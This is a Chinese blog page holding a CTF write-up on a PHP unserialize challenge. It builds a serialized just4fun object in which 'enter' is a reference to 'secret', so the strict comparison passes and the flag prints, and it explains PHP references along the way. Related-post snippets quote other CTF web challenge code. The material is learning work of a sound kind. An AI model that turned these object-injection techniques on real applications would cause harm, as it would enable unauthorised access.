ctf打卡第三天

最新推荐文章于 2022-07-07 00:33:28 发布
最新推荐文章于 2022-07-07 00:33:28 发布
阅读量310 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jie_a/article/details/117737425
版权 
include("flag.php");
class just4fun {
    var $enter;
    var $secret;
}
if (isset($_GET['pass'])) {
    $pass = $_GET['pass'];
    if(get_magic_quotes_gpc()){
        $pass=stripslashes($pass);
    }
    $o = unserialize($pass);
    if ($o) {
        $o->secret = "*";
        if ($o->secret === $o->enter)
            echo "Congratulation! Here is my secret: ".$flag;
        else
            echo "Oh no... You can't fool me";
    }
    else echo "are you trolling?";
}

抬眼望去就是个反序列化函数
我们先看代码
get_magic_quotes_gpc():php版本大于等于6由于这个函数被删除所以返回false,题目中的版本是5.5所以是返回true
在这里插入图片描述
stripslashes() 函数删除由 addslashes() 函数添加的反斜杠。
payload:

<?php
class just4fun
{
    var $enter;
    var $secret;
    function __construct()
    {
        $this->enter=&$this->secret;
    }
}
echo serialize(new just4fun());
 ?>

想了半天不知道如何构造一个让他们相等的办法
一直失败
后来上网上查了一下这里面涉及到一个PHP浅拷贝的问题
在这里插入图片描述
输出aaaaa
当b&变量a时,
a的值随着b变而变
有点类似于指针的感觉
在这里插入图片描述
当a变的时候b也跟着变,输出bbbbbbbbbb
_construct () 为构造函数,主要用于创建对象时,为对象赋初值。
传参即可
在这里插入图片描述

盖世大宝剑a
关注
strpos使用不当引发漏洞
qq_37466661的博客
08-08 1210
strpos使用不当引发漏洞
CTF平台题库writeup(一)--南邮CTF-WEB(部分)
渗透、攻防、CTF、编程
06-25 1万+
WEB题 1.签到题 题目:key在哪里? writeup:查看源代码即可获得flag! 2.md5 collision 题目: <?php $md51 = md5('QNKCDZO'); $a = @$_GET['a']; $md52 = @md5($a); if(isset($a)){ if ($a != 'QNKCDZO' && $md51 == $md52) { echo "nctf{*****************}"; } else {
从两道题目浅谈PHP深浅拷贝
crispr的博客
02-23 583
从两道题目浅谈PHP深浅拷贝 0x01 前言 最近才认认真真看完PHP,虽然还是有很多地方不会应用,因此想多看看有关PHP的题目,看到了两道和PHP深浅拷贝有关的题目,自己也把它搞懂吧。。 0x01 正文 题一:南邮ctfPHP反序列化 <?php class just4fun { var $enter; var $secret; } if (isset($_GET['...
ctfshow PHP特性(89-115)【学习记录】
ximo的博客
02-17 568
web 89 include("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } } intval() 函数用于获取变量的整数值。 但是要绕过正
buuctf刷题 4(php&Rce&escapeshellarg cmd组合漏洞)
weixin_63231007的博客
05-05 1605
[MRCTF2020]Ez_bypass 1 I put something in F12 for you include 'flag.php'; $flag='MRCTF{xxxxxxxxxxxxxxxxxxxxxxxxx}'; if(isset($_GET['gg'])&&isset($_GET['id'])) { $id=$_GET['id']; $gg=$_GET['gg']; if (md5($id) === md5($gg) &&
CTF打卡第三天
weixin_60499871的博客
07-07 119
第一题:backup打开网址如图:常见的备份文件后缀名有: 然后用记事本打开如图 :第二题:cookie 打开网址如图:这里加一些cookie知识: Cookie是当主机访问Web服务器时,由 Web 服务器创建的,将信息存储在用户计算机上的文件。一般网络用户习惯用其复数形式 Cookies,指某些网站为了辨别用户身份、进行 Session 跟踪而存储在用户本地终端上的数据,而这些数据通常会经过加密处理。然后 Fn+F12,在console上输入document.cookie如图然后在URL后加上/cook
CTF打卡第二天
weixin_60499871的博客
07-05 182
第八题:掀桌子看起来一串十六进制,马上想到转换成字符,但是不行。将两个一组,减去128,输出acsii码 ,Python脚本如图 得到如图:转战web区:第一题:view_source 点击获取在线场景,有一个网址,因为题目是要查看网页源代码,但是右键用不了,所以目的是想办法看源代码,百度查了:Ctrl+U,里面有flag 第二题:get_post打开网址,如网站上显示操作进行如图,进行get请求再利用hackbar进行post请求 得到flag如图 第三题:robots由题目提醒robots协议,立刻想到
CTF打卡第一天
weixin_60499871的博客
07-04 562
攻防世界网站:https://adworld.xctf.org.cn/ 新手区第一题:this_is_flag 第二题:pdf下载完文档, 使用PDF转换器为word,打开如下图在图下面有flag 第三题:如来十三掌 打开附件如图 使用佛日解密:得到的:MzkuM3gvMUAwnzuvn3cgozMlMTuvqzAenJchMUAeqzWenzEmLJW9,再使用 rot13解密:用Python脚本 运行得到:ZmxhZ3tiZHNjamhia3ptbmZyZGhidmNraWpuZHNrdmJramRzY
CTF打卡第二天-BUU-Java逆向解密
qq_42602454的博客
09-27 277
解压题目文件发现是一个class文件 使用jad进行反编译,得到Reverse.java文件: 查看Reverse.java文件: // Decompiled by Jad v1.5.8g. Copyright 2001 Pavel Kouznetsov. // Jad home page: http://www.kpdus.com/jad.html // Decompiler options: packimports(3) // Source File Name: Reverse.java i.
蓝鲸安全ctf打卡隐写篇----第一期
x519461623的博客
02-19 1964
第一期 1.雨中龙猫 考查base64编码和图片源码隐写 题目给出答案格式whalectf{xxx},将whalectf进行base64编码:d2hhbGVjdGY= notepad++打开源码搜索,发现并不能搜索到 因为base64编码过程会重新以6位分组,所以whalectf后面的字母可能会对whalectf的编码影响,所以搜索前几位d2hhbGVj 得到d2hhbGVjdGZ7TG 进行解...
CTFshow刷题日记-WEB-PHP特性(上篇89-115)
Love&Share
09-05 3519
Part1 有关 intval() 函数的绕过技巧 web89 clude("flag.php"); highlight_file(__FILE__); if(isset($_GET['num'])){ $num = $_GET['num']; if(preg_match("/[0-9]/", $num)){ die("no no no!"); } if(intval($num)){ echo $flag; } } 能被intval
CTFWeb-PHP弱比较与反序列化利用姿势
道阻且长,行则将至。
04-30 1825
文章目录前言PHP的弱比较No.1 ACTF- PHP的弱比较利用No.2 BJDCTF-MD5的弱/强碰撞PHP反序列化No.1 网鼎杯-朱雀组phpwebNo.2 网鼎杯-青龙组AreUSerialz 前言 在 CTF 比赛的 Web 类型题目中, PHP 反序列化漏洞的题目层出不穷,本文的目的在于通过 BUUCTF 平台几道真实的 CTF 竞赛题目,总结 PHP 反序列化漏洞在 CTF 竞赛中的一些题目类型和利用姿势。 PHP的弱比较 进入正题之前,先介绍下 PHP 弱比较的相关知识,因为它经常出现在
2016xctf一道ctf题目
一个码农的笔记
09-22 3万+
首先是index.php: <?php $user = $_GET["user"]; $file = $_GET["file"]; $pass = $_GET["pass"]; if(isset($user)&&(file_get_contents($user,'r')==="the user is admin")){ echo "hello admin!"; if(preg_
BugkuCTF-WEB-本地包含
Jaychouzzk
11-15 540
题目提示,需要将flag.php包含进去才可以得到flag 百度了一下$_REQUEST函数,发现易存在sql漏洞和变量漏洞覆盖 第二句话要获得hello的值,由于hello为’hello’,所以无论在url栏中对hello赋任何值,都会全盘接受,其中var_dump()是将变量a打印到界面中,在根据eval函数的特性(计算后面括号中的表达式) SO——   (1)a变量由$_REQU...
web安全的学习之路(十一)
water的博客
09-08 288
实验吧 天网管理系统 打开这道题,这是一道传说中的简单题目 进入题目,两个输入框,上面白纸黑字的写着用户名和密码(你觉得我会相信你吗?。。。好吧我相信了) 尝试一下username 和password 都是admin。。(明显不行) 那就查看一下源代码,在源代码中发现了一句话: <!-- $test=$_GET['username']; $test=md5($test); if($test=...
CTF网络攻防总结
Fantastic
02-11 6411
文章目录
CG_CTF web篇(中)
weixin_45689999的博客
02-25 404
变量覆盖 点开source.php,查看源代码 <?php if ($_SERVER["REQUEST_METHOD"] == "POST") { ?> <?php extract($_POST); if ($pass == $thepa...
南京邮电大学网络攻防训练平台writeup
weixin_34406086的博客
01-06 4017
本文带目录版本:https://findneo.github.io/170924NuptCTFWP/ 南邮CTF平台网址: http://ctf.nuptsast.com/challenges http://ctf.nuptzj.cn/challenges WEB 签到题 nctf{flag_admiaanaaaaaaaaaaa} ctrl+u或右键查看源代码即可。在CTF比赛中,代码...
CTF writeup 2_南邮网络攻防训练
热门推荐
Troy
10-28 146万+
地址地址WEB签到题这一定是最简单的 传送门:http://chinalover.sinaapp.com/web1/“key在哪里? ” 在源码里~md5 collision源码<?php $md51 = md5('QNKCDZO'); $a = @$_GET['a']; $md52 = @md5($a); if(isset($a)){ if ($a != 'QNKCDZO' && $md51
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值